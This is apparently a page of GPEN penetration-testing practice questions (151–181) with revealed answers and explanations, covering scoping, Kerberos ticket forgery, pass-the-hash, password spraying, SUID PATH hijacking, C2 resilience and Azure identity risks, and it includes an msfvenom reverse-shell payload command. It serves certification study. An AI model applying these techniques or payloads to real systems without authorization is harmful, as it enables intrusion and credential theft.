Courseiva

GIAC Penetration Tester (GPEN) — Questions 151–225

298 questions total · 4pages · All types, answers revealed

Page 2

Page 3 of 4

Page 4
151
MCQmedium

During the scoping phase of a penetration test for a global e-commerce client, you identify that the client uses a cloud-based Content Delivery Network (CDN) to host static assets. Which action is the most critical for ensuring the engagement remains within the Rules of Engagement (RoE)?

A.Perform a SYN scan against the CDN IP ranges to identify open ports.
B.Incorporate the CDN provider's IP space into the primary target scope.
C.Verify if the client has explicit written permission from the CDN provider.
D.Bypass the CDN by mapping the origin server's IP address directly.
AnswerC

Verifying written permission is necessary because CDNs are external service providers. Testing them without authorization is a violation of the Rules of Engagement. Obtaining documented consent ensures that the testing activity is permitted under the provider's acceptable use policy, mitigating legal risks for both the tester and the client.

Why this answer

Testing a CDN often involves third-party infrastructure that falls outside the client's direct control. Testing these assets without explicit authorization from the CDN provider can trigger automated DDoS mitigations or legal disputes. Confirming whether the CDN is in-scope prevents accidental service disruption and potential contractual violations, ensuring the pentest methodology adheres to legal boundaries and professional standards regarding third-party service provider interaction.

Exam trap

Candidates often assume cloud assets owned by the client can be freely scanned without checking if third-party CDN providers require explicit authorization.

152
MCQeasy

Which document is primarily responsible for defining the 'Rules of Engagement' (RoE) in a penetration testing project?

A.The Statement of Work (SOW).
B.The Rules of Engagement (RoE) document.
C.The Non-Disclosure Agreement (NDA).
D.The Service Level Agreement (SLA).
AnswerB

The RoE document is specifically created to define the operational parameters of the assessment. It details the scope, prohibited actions, communication protocols, and escalation procedures, providing the technical team with a clear set of guidelines to follow while performing the assessment to ensure safety and compliance.

Why this answer

The Rules of Engagement document serves as the operational handbook for the penetration test, detailing exactly what is permitted, what is prohibited, and the emergency procedures to follow. It bridges the gap between the legal contract and the technical execution, ensuring that all parties have a mutual understanding of the engagement's boundaries, safety protocols, and professional expectations, which is critical for minimizing risks during testing.

Exam trap

Candidates often confuse the Rules of Engagement (RoE) with the Statement of Work (SOW) or the legal contract, failing to recognize the RoE as the specific document governing technical testing procedures.

153
MCQmedium

Which of the following is a primary advantage of using a 'Golden Ticket' attack over other credential-based attacks?

A.It does not require administrative privileges to execute.
B.It provides persistent access even after the user changes their password.
C.It is easily detectable by standard antivirus software.
D.It is limited to a single service on the network.
AnswerB

Because the Golden Ticket is a forged TGT, it is independent of individual user accounts or passwords. Even if an administrator changes their password or resets their account, the attacker can continue to use the forged ticket to access resources until the KRBTGT password itself is reset.

Why this answer

A Golden Ticket attack involves the compromise of the KRBTGT account, which is the master account for the Kerberos service in a domain. This allows an attacker to forge TGTs that can request access to any resource. Because the attacker controls the TGT, they can grant themselves administrative privileges and bypass standard password changes, making it a highly persistent and difficult-to-detect method of maintaining domain control.

Exam trap

Candidates often assume the Golden Ticket gives access to a specific user's credentials. They fail to grasp that the ticket is forged for the KRBTGT account, granting domain-wide, persistent, and forged identity access.

154
MCQmedium

Refer to the exhibit. An Nmap scan returns output indicating a web server is responding, but the `http-enum` script fails to identify common directories. Which action should the tester take to improve detection?

A.Increase the timing template to -T5 to make the scan faster.
B.Add the --script-args='http-enum.basepath=/admin' argument to the command.
C.Use a specialized web discovery tool like ffuf or Gobuster with a large wordlist.
D.Change the scan to -sS to perform a stealthy SYN scan instead of service detection.
AnswerC

Nmap's http-enum script uses a relatively small, hardcoded wordlist. Dedicated tools like Gobuster or ffuf allow for custom, extensive wordlists and high-concurrency requests, which are far more effective at discovering hidden web directories that Nmap scripts would overlook in a standard scan.

Why this answer

The current command lacks service-specific depth. Adding a more comprehensive script category or using a specialized tool like Dirbuster or Burp Suite allows for brute-forcing against common file paths. Service version detection and enumeration scripts in Nmap are limited by the wordlist provided.

Improving detection requires moving beyond passive enumeration into active path discovery, which is essential for identifying hidden administrative interfaces or unlinked configuration files.

Exam trap

Candidates assume Nmap's default scripts are exhaustive. They often suggest running more Nmap scripts, failing to realize that specialized tools are required for effective web directory brute-forcing.

155
MCQhard

During a penetration test, a tester runs an OpenVAS scan against a web server and receives a report indicating a high-severity vulnerability with a CVE identifier. Before including it in the final report, the tester wants to verify if the vulnerability is actually exploitable. Which action should the tester take next?

A.Manually test the vulnerability using a proof-of-concept exploit or crafted request.
B.Check the CVE details in the National Vulnerability Database (NVD).
C.Review the scanner's plugin documentation to understand the detection logic.
D.Re-run the scan with a different scanner to confirm the finding.
AnswerA

Manually testing with a PoC or crafted request provides direct evidence of exploitability. It confirms whether the vulnerability is real and can be triggered in the target environment, which is essential for an accurate penetration test report. This step distinguishes between theoretical findings and actual risk.

Why this answer

Manual testing with a proof-of-concept or crafted request is the most reliable way to verify that a reported vulnerability is exploitable. It provides concrete evidence, reduces false positives, and ensures the finding is accurate before reporting. Other actions may offer context but do not directly confirm exploitability.

Exam trap

The trap here is assuming that a CVE match from a scanner automatically means the target is vulnerable, when in fact manual validation is needed to confirm exploitability.

156
MCQeasy

Which of the following is a primary goal during the 'Exploitation' phase of a penetration test?

A.To document all vulnerabilities found.
B.To gain unauthorized access or influence target systems.
C.To scan the entire network for open ports.
D.To patch the vulnerabilities identified.
AnswerB

The core objective of exploitation is to turn a vulnerability into an active exploit, gaining unauthorized access or executing code. This validates the risk assessment and demonstrates the impact of the identified security flaws in a controlled, safe manner that is consistent with the test's scope.

Why this answer

The primary goal during exploitation is to prove the existence of a vulnerability by successfully executing code or accessing unauthorized data. It is not just about finding the vulnerability; it is about demonstrating its impact. This confirms the risk to the client and allows for a more accurate assessment of the potential consequences if the flaw were exploited by a real-world attacker.

Exam trap

Candidates often confuse the exploitation phase goal with vulnerability discovery or information gathering, forgetting that exploitation specifically requires demonstrating impact through unauthorized access.

157
MCQeasy

A penetration tester needs to generate a standalone Windows executable payload that will connect back to the tester's machine at 10.10.14.5 on port 4444. The tester wants to avoid depending on the Metasploit console during payload generation. Which msfvenom command should be used?

A.msfvenom -p windows/meterpreter/reverse_tcp LHOST=4444 LPORT=10.10.14.5 -f exe -o payload.exe
B.msfvenom -p windows/meterpreter/bind_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o payload.exe
C.msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o payload.exe
D.msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o payload.exe
AnswerD

This command uses msfvenom to generate a Windows Meterpreter reverse TCP payload with the correct callback address and port, and writes it as an executable named payload.exe. It matches all stated requirements: standalone generation outside the console, Windows target, and reverse connection to 10.10.14.5:4444.

Why this answer

The correct msfvenom syntax requires -p to specify the payload, LHOST for the callback IP address, LPORT for the callback port, -f for the output format, and -o for the output file. The windows/meterpreter/reverse_tcp payload with LHOST=10.10.14.5 and LPORT=4444 produces the desired executable. Swapping LHOST and LPORT or choosing a bind or plain shell payload fails to meet the scenario.

Exam trap

The trap here is mixing up LHOST and LPORT values, or selecting a bind payload when a reverse connection is required.

158
MCQmedium

A penetration tester extracts a domain user's NT hash from the SAM database of a workstation and wants to authenticate to a file share on a different server without knowing the plaintext password. Which of the following techniques should the tester use?

A.Pass-the-Ticket by injecting a forged Kerberos TGT into memory
B.Kerberoasting the target service account to obtain its TGS ticket
C.Pass-the-Hash using the NT hash directly in an authentication request
D.Rainbow table lookup against the NT hash to recover the plaintext password
AnswerC

Pass-the-Hash exploits the fact that Windows authentication protocols accept the NT hash itself as proof of identity, so a tester can authenticate to SMB, WMI, or other services without cracking the hash. The NT hash is the actual credential material stored in SAM or LSASS, so it can be used directly with tools like Mimikatz or Impacket. This is the correct approach here because the scenario explicitly requires authentication without the plaintext password.

Why this answer

Pass-the-Hash is the correct technique because Windows authentication protocols accept the NT hash as a valid credential. An attacker who extracts the hash can use it to authenticate to remote services without cracking the plaintext. The other options either aim at password recovery or rely on different credential material, such as Kerberos tickets, which are not present in this scenario.

The key distinction is that Pass-the-Hash uses the hash directly for authentication.

Exam trap

The trap here is assuming that an extracted NT hash must be cracked before it can be used for authentication, when in fact the hash itself can be replayed to access resources.

159
MCQmedium

You have identified a Windows Server 2019 target running a custom service that is vulnerable to a stack-based buffer overflow. You develop a working exploit and want to execute it during an authorized penetration test. After sending the payload, the service crashes and the target reboots. You need to minimize the impact on the production environment while still validating the vulnerability. Which approach should you take?

A.Use a bind shell payload to gain a command shell and then immediately patch the service.
B.Use a staged payload that downloads a second stage, as this reduces the initial payload size and prevents crashes.
C.Debug the exploit locally in a lab environment that mirrors the target to identify the correct offset and payload, then test again.
D.Modify the exploit to use a reverse shell payload and execute it during off-peak hours.
AnswerC

This is the correct approach because it isolates the exploit development from production. By replicating the target environment, you can safely determine the exact offset, test payloads, and ensure stability. Only after confirming a reliable exploit should you consider testing against the production system, ideally with a non-destructive proof-of-concept.

Why this answer

The safest way to develop and validate an exploit is to replicate the target environment in a lab. This allows you to debug the exploit, find the correct offset, and test payloads without risking production systems. Once the exploit is stable, you can perform a controlled test on the target, but only after ensuring it will not crash the service.

This approach aligns with penetration testing best practices.

Exam trap

The trap here is assuming that using a different payload type or timing will prevent crashes, when the real issue is often an incorrect offset or exploit logic that must be fixed in a lab first.

160
MCQmedium

Which of the following actions is the most appropriate step after discovering a critical vulnerability that is currently being exploited in the wild?

A.Wait until the full scan report is generated at the end of the month.
B.Notify the system owners and trigger an out-of-band remediation process.
C.Re-run the scan to verify the vulnerability is not a false positive.
D.Isolate the server from the network immediately without notifying anyone.
AnswerB

Actively exploited vulnerabilities require immediate attention. Notifying the owners and initiating an out-of-band remediation process bypasses standard, slower reporting cycles, allowing for rapid patching or the implementation of temporary compensating controls to block exploitation attempts while the permanent fix is tested and deployed.

Why this answer

Immediate risk mitigation is required for vulnerabilities actively exploited in the wild. This involves prioritizing remediation and documenting the findings. Following standard vulnerability management practices ensures that the highest risks are addressed first, which is essential to minimize the window of exposure.

Waiting for a formal report before taking action on actively exploited vulnerabilities could result in a successful compromise of the organization's infrastructure.

Exam trap

Candidates often choose 'wait for the final report' as the correct action. In a professional setting, critical vulnerabilities being actively exploited require immediate out-of-band communication, not report-based delays.

161
MCQeasy

You are reviewing the scope of an upcoming penetration test and need to identify the organization's mail exchangers and the servers authoritative for its DNS zones using only publicly available records. Which DNS record types should you query to obtain this information directly?

A.MX and NS
B.A and AAAA
C.SOA and PTR
D.CNAME and TXT
AnswerA

MX records specify the mail exchangers responsible for accepting email on behalf of the domain, and NS records identify the authoritative name servers for the zone. Querying these two record types directly yields the mail infrastructure and the DNS authority the scenario asks for. Both are publicly available through standard DNS queries, making them ideal for passive reconnaissance.

Why this answer

MX records list the hosts that accept mail for a domain, and NS records list the authoritative name servers for the zone. Querying these two record types directly returns the mail exchangers and DNS authority the tester needs. Both are standard, publicly resolvable records, making them well suited to the reconnaissance phase without generating suspicious traffic.

Exam trap

The trap here is confusing SOA with NS, since the SOA record names a primary server but does not list all authoritative name servers for the zone.

162
MCQmedium

Refer to the exhibit. Given this output, which action is most appropriate for a penetration tester?

A.Attempt to restart the system to reset privileges.
B.Use the privilege to dump process memory, such as LSASS.
C.Disable the privilege to ensure system stability.
D.Install a rootkit to hide the enabled privilege.
AnswerB

SeDebugPrivilege allows a user to debug any process. By attaching to the Local Security Authority Subsystem Service (LSASS), you can dump the memory to extract clear-text passwords or NTLM hashes, which are essential for escalating privileges within the local system and moving laterally across the Windows domain environment.

Why this answer

SeDebugPrivilege is a powerful right that allows a user to attach to any process, including those running as SYSTEM. This privilege is instrumental in privilege escalation, as it allows for memory dumping of LSASS to extract credentials or the injection of malicious code into high-privilege processes. Identifying this privilege enables the tester to move from a standard user context to a full system-level compromise effectively.

Exam trap

Candidates frequently mistake SeDebugPrivilege for an automatic root shell. They forget that while it grants high-level access to processes, it still requires manual interaction to dump memory or inject code.

163
MCQmedium

You are planning a penetration test for a client that has a hybrid cloud environment. The client's security team wants to ensure that the test does not violate the shared responsibility model of their cloud provider. Which of the following should you do FIRST to align the test with the cloud provider's policies?

A.Deploy a jump box in the cloud to conduct testing from within the provider's network.
B.Assume that the client's authorization covers all cloud resources since they pay for the service.
C.Obtain written authorization from the client's CEO to test all cloud-hosted assets.
D.Review the cloud provider's acceptable use policy and penetration testing guidelines.
AnswerD

Cloud providers like AWS, Azure, and GCP have specific policies regarding penetration testing. Reviewing these first ensures that your planned activities are permitted and that you follow any required notification or approval processes. Ignoring these policies could result in account suspension or legal action, even if the client authorized the test.

Why this answer

The first step is to review the cloud provider's penetration testing policies. These policies define what is allowed, what requires notification, and what is strictly prohibited. Aligning with them ensures the test is both effective and compliant, avoiding disruption to the client's cloud services.

Exam trap

The trap here is assuming that client authorization alone is sufficient for cloud testing, overlooking the provider's separate policies.

164
MCQhard

What is the primary risk associated with 'Unconstrained Delegation' in Active Directory?

A.It forces the use of NTLM for all authentication requests.
B.It allows the service to cache user TGTs, which can be extracted by an attacker.
C.It requires the domain controller to store plaintext passwords for all users.
D.It prevents the KDC from enforcing password expiration policies.
AnswerB

Unconstrained delegation causes the KDC to send the user's TGT to the service along with the TGS. The service caches this TGT in memory. An attacker with administrative access to that machine can dump the memory, retrieve the TGT, and use it to impersonate users anywhere.

Why this answer

In unconstrained delegation, a service account can take a user's TGT (which is sent to the service during authentication) and store it in its own memory. An attacker who compromises such a service can extract these stored TGTs. Because the TGT is valid for the whole domain, the attacker can then impersonate those users to any service in the domain, leading to total environment compromise.

Exam trap

Candidates often confuse Unconstrained Delegation with Constrained Delegation. They incorrectly assume it involves the KDC directly or limits the service to specific target servers, missing the core risk of TGT caching.

165
MCQmedium

Which of the following describes the risk of 'Guest User' accounts in an Azure AD integration scenario?

A.Guest users are automatically granted Global Administrator privileges.
B.Guest accounts can only be created by the Global Administrator.
C.Guest users can potentially enumerate directory objects unless restricted.
D.Guest users are exempt from Conditional Access policies.
AnswerC

By default, guest users can read directory information, including the list of users, groups, and applications. Restricting these permissions via the 'External Collaboration Settings' in Azure AD is a mandatory hardening step to ensure that external entities cannot perform reconnaissance on the internal directory structure.

Why this answer

Guest accounts in Azure AD often have default permissions that allow them to enumerate directory objects. If these guests are not properly scoped using 'External Collaboration Settings', an attacker can use a compromised guest account to map the internal organizational structure, identify high-value targets, and find misconfigured applications. This reconnaissance is often the first step in a broader, more successful targeted attack against the internal environment.

Exam trap

Candidates often assume that guest accounts are harmless because they have 'limited' access. They fail to realize that the default directory enumeration permissions can leak sensitive information about the entire organization.

166
MCQmedium

When conducting a penetration test on an Azure App Service, you discover an 'environment.js' file in the public directory containing a 'CLIENT_ID'. What is the risk associated with this finding?

A.The attacker can use the Client ID to authenticate as the application.
B.The attacker can use the Client ID to construct a tailored consent-phishing URL.
C.The attacker can use the Client ID to reset the application's password.
D.The attacker can use the Client ID to bypass MFA for the application.
AnswerB

The Client ID is a required parameter for the OAuth2 authorization URL. By knowing the ID, an attacker can build a custom URL that directs users to the Microsoft identity platform to grant permissions to the application, making the phishing attempt look more legitimate to the target user.

Why this answer

Client IDs are public and not secrets in themselves. However, exposing them can reveal the application's configuration and identifier, which an attacker can then use to craft malicious authorization requests. If the application is misconfigured to allow unauthorized consent or has other vulnerabilities, the Client ID acts as the starting point for a targeted phishing or consent-based attack against the organization's users.

Exam trap

Candidates often mistake a Client ID for a sensitive secret like a Client Secret or Certificate. Consequently, they overestimate the immediate danger of an 'environment.js' file exposure.

167
MCQhard

During an internal penetration test, a tester gains access to a Windows domain controller and extracts the NTDS.dit file along with the SYSTEM registry hive. The tester wants to extract all domain user password hashes for offline cracking. Which tool, when used with the appropriate arguments, can parse these files to retrieve the hashes?

A.Mimikatz
B.John the Ripper
C.hashcat
D.secretsdump.py
AnswerD

secretsdump.py from Impacket can parse an offline NTDS.dit file when provided with the SYSTEM hive to decrypt the encrypted hash data. It extracts NTLM hashes, Kerberos keys, and other secrets. This tool is specifically designed for this purpose and is widely used in penetration testing to obtain domain credentials from extracted Active Directory databases. It supports both online and offline extraction, making it suitable for this scenario.

Why this answer

secretsdump.py is the correct tool because it can parse an offline NTDS.dit file when paired with the SYSTEM hive to decrypt the encrypted password hashes. It extracts NTLM hashes and other secrets, which can then be cracked offline. Mimikatz is used for live memory extraction, while hashcat and John the Ripper are cracking tools that require pre-extracted hashes.

Therefore, secretsdump.py is the only tool that directly accomplishes the extraction from the given files.

Exam trap

The trap here is assuming that Mimikatz can parse offline NTDS.dit files, when it is primarily used for live credential extraction.

168
MCQeasy

A penetration tester is configuring a vulnerability scanner to assess a sensitive production network. The tester wants to avoid causing service disruptions or overwhelming network devices. Which scanner setting should be adjusted to best achieve this?

A.Disable all plugin families except those that perform denial-of-service testing to quickly identify weak points.
B.Set the scanner to use a random port order and maximum timing template to evade detection.
C.Increase the maximum number of concurrent hosts and checks per host to finish faster.
D.Enable safe checks and reduce the scan's performance settings to limit simultaneous connections.
AnswerD

Safe checks avoid plugins known to disrupt services, and lowering performance settings reduces concurrent connections and packet rate. This combination minimizes the risk of overwhelming network devices or causing service outages. It is the standard approach for scanning sensitive production environments where availability is critical.

Why this answer

To avoid disrupting a sensitive production network, the scanner should be configured with safe checks enabled and performance settings lowered to reduce concurrent connections and packet rate. This minimizes the risk of overwhelming devices or causing service outages. Disabling DoS plugins and avoiding aggressive timing are also important, but safe checks and reduced performance are the primary controls.

Exam trap

The trap here is equating speed or stealth with safety, when in production environments the priority is limiting concurrency and avoiding intrusive checks.

169
Multi-Selectmedium

A penetration tester is conducting a password attack against a Windows Active Directory environment. The tester has obtained a list of usernames and wants to perform a password spraying attack to avoid account lockouts. Which two considerations are most important when executing this attack? (Choose two.)

Select 2 answers
A.Perform the attack during non-business hours to avoid detection.
B.Target only privileged accounts to maximize impact.
C.Use a large list of unique passwords for each account.
D.Use a small number of common passwords across many accounts.
E.Ensure the lockout threshold is not exceeded for any account.
AnswersD, E

Password spraying involves trying a few common passwords against many accounts to avoid lockout thresholds. Using a small set of passwords reduces the risk of triggering lockouts because each account is only tried a few times. This approach increases the chance of finding weak passwords without alerting security controls. It is a fundamental principle of password spraying attacks in Active Directory environments.

Why this answer

Password spraying aims to avoid lockouts by trying a few common passwords across many accounts. The two most important considerations are using a small number of common passwords and ensuring the lockout threshold is not exceeded for any account. These directly address the goal of avoiding lockouts while maximizing coverage.

The other options either describe brute-force tactics or focus on evasion rather than the fundamental spraying methodology.

Exam trap

The trap here is confusing password spraying with brute-force, leading to selection of using large unique password lists.

170
MCQhard

When attempting to escalate privileges on a Linux system, what is the significance of the SUID bit on a file owned by root?

A.It forces the file to run within a restricted sandbox environment.
B.It permits the file to execute with the owner's privileges.
C.It enables the file to be readable by all users on the system.
D.It automatically encrypts the file contents at rest.
AnswerB

When the SUID bit is set, the process runs as the owner of the file. If that owner is root, the process runs with root privileges. This behavior is intentional for specific system binaries, but it creates a vulnerability if the binary can be abused to perform unintended actions.

Why this answer

The SUID (Set User ID) bit allows a file to execute with the permissions of the file owner rather than the user executing it. If an attacker identifies a SUID file owned by root, they can potentially manipulate the execution flow to gain a root shell. This is a primary target for privilege escalation, as it permits users to circumvent standard permission constraints during execution.

Exam trap

Candidates often think SUID files are inherently malicious. They fail to understand that SUID is a legitimate feature that only becomes a security risk when applied to user-writable, root-owned files.

171
MCQmedium

A penetration tester has obtained a set of Linux shadow file hashes. The hashes begin with $6$ and the tester intends to perform an offline brute-force attack using Hashcat. Which mode should the tester select to ensure Hashcat correctly interprets these hashes?

A.500 (md5crypt)
B.1800 (sha512crypt)
C.3200 (bcrypt)
D.1000 (NTLM)
AnswerB

Hashcat mode 1800 corresponds to sha512crypt, which is the algorithm identified by the $6$ prefix in the shadow file hash. This is the correct mode to use because the hash format matches exactly, allowing Hashcat to properly parse and attack the hash. Using any other mode would result in incorrect parsing and failed cracking attempts.

Why this answer

The $6$ prefix in a Linux shadow file indicates the sha512crypt algorithm, which is supported by Hashcat mode 1800. Choosing the correct mode is essential because Hashcat must parse the hash structure, including salt and iteration count, to perform the attack. Other modes correspond to different algorithms and will not work with this hash type.

Exam trap

The trap here is assuming that any hash with a dollar sign prefix is md5crypt, but the number after the dollar sign specifies the algorithm, and $6$ is sha512crypt.

172
MCQmedium

During a penetration test, you obtain a memory dump from a Windows Server 2016 system. You suspect that a domain administrator recently logged on and left credentials in memory. Which tool is specifically designed to extract plaintext passwords and hashes from Windows memory dumps?

A.John the Ripper
B.Mimikatz
C.Hashcat
D.Volatility
AnswerB

Mimikatz is a post-exploitation tool that extracts plaintext passwords, hashes, PINs, and Kerberos tickets from memory. It can parse memory dumps for credentials by targeting the Local Security Authority Subsystem Service (LSASS). In this scenario, Mimikatz is the appropriate tool to retrieve the domain administrator's credentials from the memory dump.

Why this answer

Mimikatz is the tool of choice for extracting credentials from Windows memory dumps. It directly parses LSASS memory to retrieve plaintext passwords and hashes. While Volatility can analyze memory dumps, it requires additional plugins for credential extraction.

Hashcat and John the Ripper are cracking tools, not extraction tools, so they are not suitable for this scenario.

Exam trap

The trap here is confusing memory analysis frameworks like Volatility with credential extraction tools like Mimikatz, or assuming that password crackers can extract credentials from memory.

173
MCQeasy

A penetration tester is analyzing a Kerberos attack that involved forging a ticket to gain access to a specific server. The ticket was encrypted with the server's machine account hash and did not involve communication with the domain controller. Which type of attack does this describe?

A.Silver Ticket
B.Golden Ticket
C.AS-REP Roasting
D.Kerberoasting
AnswerA

A Silver Ticket is a forged service ticket (TGS) encrypted with the target service account's hash, such as a machine account hash for a server. It does not require communication with the domain controller because the service decrypts the ticket with its own key and trusts the embedded PAC. This matches the description of gaining access to a specific server without DC interaction.

Why this answer

A Silver Ticket is a forged service ticket encrypted with the target service's key, allowing access without contacting the DC. Golden Tickets are forged TGTs encrypted with the krbtgt hash. Kerberoasting and AS-REP Roasting involve requesting legitimate tickets for offline cracking, not forging.

Thus, the description matches a Silver Ticket.

Exam trap

The trap here is confusing Silver Tickets with Golden Tickets; both are forged, but Silver Tickets target a specific service and use the service's key, while Golden Tickets target the domain and use the krbtgt key.

174
MCQmedium

Which of the following is a primary benefit of using Managed Identities for Azure resources?

A.It allows the resource to access any other resource in the tenant by default.
B.It removes the need to store and manage credentials in application code.
C.It provides a mechanism to impersonate any user in the directory.
D.It bypasses the need for MFA when accessing sensitive databases.
AnswerB

By using a managed identity, the application uses the platform's identity to authenticate. The platform manages the secret rotation, and the application never sees or handles the credentials. This prevents common vulnerabilities related to credential exposure, such as hardcoding secrets in source control or configuration files.

Why this answer

Managed Identities eliminate the need for developers to manage credentials (like service principal secrets) within their application code. By having Azure handle the identity, the risk of credential leakage via hardcoded strings or insecure configuration files is virtually eliminated. This is a critical security improvement for cloud-native applications, as it relies on the platform to rotate secrets automatically and securely.

Exam trap

Test-takers often select options related to improving network speed or bypassing firewall restrictions, misunderstanding that managed identities solve credential management and storage challenges.

175
Multi-Selectmedium

A penetration tester is performing a password attack against an Active Directory environment and has obtained a list of domain user accounts. The tester wants to perform a password spraying attack to identify weak passwords while minimizing the risk of account lockouts. Which TWO of the following are best practices for conducting a password spraying attack in this scenario? (Choose two.)

Select 2 answers
A.Monitor the domain controller's event logs for lockout events (e.g., Event ID 4740) to detect when the lockout threshold is being approached and adjust your attack accordingly.
B.Attempt all passwords in your list against a single account before moving to the next account to quickly identify which account has a weak password.
C.Use a small set of commonly used passwords, such as 'Password123' and 'Summer2024', and try each password against all accounts with a delay between attempts.
D.Use a single password for all accounts and attempt it simultaneously across all accounts using multiple threads to maximize speed.
E.Use the domain's password policy to determine the lockout threshold and observation window, then space attempts so that no account exceeds the threshold within that window.
AnswersC, E

Password spraying involves trying a few common passwords against many accounts. Using a small set reduces the chance of hitting the lockout threshold. Adding delays between attempts helps avoid triggering lockout policies based on time windows. This approach balances effectiveness with stealth and safety, making it a best practice for spraying in Active Directory environments.

Why this answer

Effective password spraying requires using a small set of common passwords and pacing attempts to avoid lockouts. Knowing the domain's lockout policy allows the attacker to stay under the threshold. Trying many passwords per account or using high concurrency can trigger lockouts, defeating the purpose.

Monitoring lockout events is a defensive measure, not an offensive best practice.

Exam trap

The trap here is confusing password spraying with brute-forcing, leading to the mistake of trying many passwords per account or ignoring lockout policies.

176
Multi-Selectmedium

You are designing a resilient command-and-control (C2) infrastructure for an authorized penetration test. The client's network has strict egress filtering and monitors for anomalous traffic. You need to ensure that your C2 channel can survive the takedown of a single server and adapt to changing network conditions. Which two of the following techniques should you implement? (Choose two.)

Select 2 answers
A.Implement a fallback channel that uses a different protocol (e.g., DNS) if the primary channel is blocked.
B.Enable jitter and sleep intervals to randomize beacon timing and avoid pattern-based detection.
C.Use multiple redirectors with domain fronting to distribute traffic and hide the true C2 server.
D.Configure the C2 client to use a single hardcoded IP address for the C2 server to simplify reconnection.
E.Use a single domain name with a long TTL to minimize DNS lookups and reduce the chance of detection.
AnswersA, C

A fallback channel provides an alternative communication path if the primary protocol is blocked or degraded. For example, if HTTPS is blocked, the client can switch to DNS tunneling. This adaptability ensures continued command and control even when network conditions change or defenses are updated. It is a key component of resilient C2 design.

Why this answer

Resilient C2 infrastructure requires redundancy and adaptability. Multiple redirectors with domain fronting provide redundancy and hide the true server, making takedown more difficult. A fallback channel using a different protocol ensures communication continues if the primary channel is blocked.

These two techniques directly address survivability and adaptability. The other options either introduce single points of failure or focus on stealth rather than resilience.

Exam trap

The trap here is confusing stealth techniques like jitter with resilience techniques; jitter helps avoid detection but does not help if the C2 server is taken offline.

177
MCQhard

During a Linux assessment you find a root-owned binary with the SUID bit set that calls the system() function using a relative path, such as system("cat /etc/hostname"). The binary's directory is not writable, but your current directory is. Which technique is most likely to let you execute arbitrary code as root?

A.Use LD_PRELOAD to inject a shared library into the SUID process and hook the system() call
B.Create a malicious executable named cat in your current directory and manipulate PATH so it is found before /bin
C.Set the SUID bit on /bin/cat so the command runs as root when invoked
D.Overwrite the SUID binary with a copy of /bin/sh to inherit its root ownership
AnswerB

Because the SUID binary invokes system() with a relative command name, the shell resolves cat using the inherited PATH. If you place a malicious cat earlier in PATH, it executes with the binary's effective root privileges. This is the classic PATH hijacking escalation for SUID programs that call commands without absolute paths.

Why this answer

A root-owned SUID binary that calls system() with a relative command name inherits the caller's PATH, so a low-privileged user can place a malicious executable earlier in PATH and have it run as root. This PATH hijacking is the intended escalation for the described weakness, and the unwritable binary directory does not prevent it.

Exam trap

The trap here is reaching for LD_PRELOAD or SUID-on-a-system-binary tricks, when the loader strips LD_PRELOAD for SUID programs and you cannot modify root-owned files anyway.

178
MCQhard

When analyzing a hybrid identity environment, you notice the use of 'Seamless Single Sign-On'. What is the potential impact if the 'AZUREADSSOACC' computer object in the on-premises Active Directory is compromised?

A.The attacker can directly modify the Azure AD tenant settings.
B.The attacker can generate valid Kerberos tickets to facilitate cloud authentication.
C.The attacker can permanently disable synchronization between on-premises and cloud.
D.All password hash synchronization processes will immediately cease.
AnswerB

Seamless SSO works by providing a Kerberos ticket that Azure AD trusts. If the computer object is controlled by an attacker, they can abuse its service key to request and forge tickets for any user account synchronized in the directory, allowing for seamless, unauthorized cloud authentication.

Why this answer

The AZUREADSSOACC object is a computer account created in AD with a Kerberos service principal name. If compromised, an attacker can request Kerberos tickets to impersonate users or potentially extract the decryption key. This allows the attacker to silently authenticate as others to the cloud, bypassing the need for secondary checks, making it a critical pivot point in hybrid identity attacks.

Exam trap

Candidates often confuse this with Golden Ticket attacks on standard domain controllers. They fail to recognize that the AZUREADSSOACC account is a unique object specifically for cloud authentication.

179
MCQmedium

Why is 'Password Writeback' considered a significant security risk in hybrid identity integrations?

A.It stores plaintext passwords on the Azure AD Connect server.
B.It allows cloud-based compromise to escalate into the on-premises domain.
C.It requires the on-premises firewall to allow inbound connections from the internet.
D.It automatically disables the on-premises password policy.
AnswerB

By allowing the cloud to set on-premises passwords, the trust boundary is reversed. An attacker who compromises a high-privileged account in Azure AD can use the writeback feature to reset passwords for Domain Admins or other sensitive accounts, granting them full control over the on-premises infrastructure.

Why this answer

Password Writeback enables the cloud to update passwords on-premises. While convenient, it creates a bidirectional path. If an attacker gains control of a cloud-based administrator account, they can reset the password of any on-premises user, including sensitive accounts.

This effectively elevates the cloud's influence over the on-premises environment, turning a cloud-only compromise into a full-scale domain-wide security disaster.

Exam trap

Test-takers frequently confuse Password Writeback with single sign-on or directory synchronization benefits, overlooking the critical bidirectional security risk of cloud-to-on-premises escalation.

180
MCQeasy

What is the primary benefit of using passive reconnaissance before initiating active scanning?

A.To identify vulnerabilities without touching the server.
B.To minimize the footprint of the testing engagement.
C.To guarantee access to the target's internal network.
D.To bypass the organization's internal intrusion detection systems.
AnswerB

Passive techniques leave no direct trace on the target systems, as no packets are sent to them. This is the safest way to begin an assessment. By gathering as much intelligence as possible through passive means, the tester avoids triggering alarms, giving them more time to plan a stealthy exploitation phase.

Why this answer

Passive reconnaissance gathers information without alerting the target, allowing the tester to build a comprehensive profile without being blocked. This minimizes the risk of triggering security systems early in the engagement. By understanding the organization's architecture through public sources first, the tester can perform more targeted and efficient active scanning later, significantly increasing the probability of success while reducing the likelihood of early detection by the security operations center.

Exam trap

Candidates often confuse passive reconnaissance benefits with gaining root access or bypassing firewalls, overlooking that its main goal is keeping the testing footprint minimal.

181
MCQmedium

Refer to the exhibit. Which command allows the tester to switch their interaction focus from session 1 to session 2?

A.sessions -s 2
B.sessions -i 2
C.switch 2
D.use session 2
AnswerB

The '-i' flag stands for interact, and specifying the session ID (2 in this case) correctly switches the console focus to that session. This is the standard procedure in Metasploit for moving between different active shells when managing multiple compromises during a large-scale penetration test engagement.

Why this answer

Managing multiple sessions is a common task in professional penetration tests where an attacker may have compromised several machines. The 'sessions -i' command is the standard way to switch the console interface to a different active session. Being able to quickly toggle between sessions is essential for maintaining control over multiple compromised systems simultaneously without needing to manually reconnect to each one.

Exam trap

Candidates often guess command syntax like 'switch 2' or 'interact 2' instead of the standard Metasploit 'sessions -i' syntax, failing to recall the specific flags used for session management.

182
MCQmedium

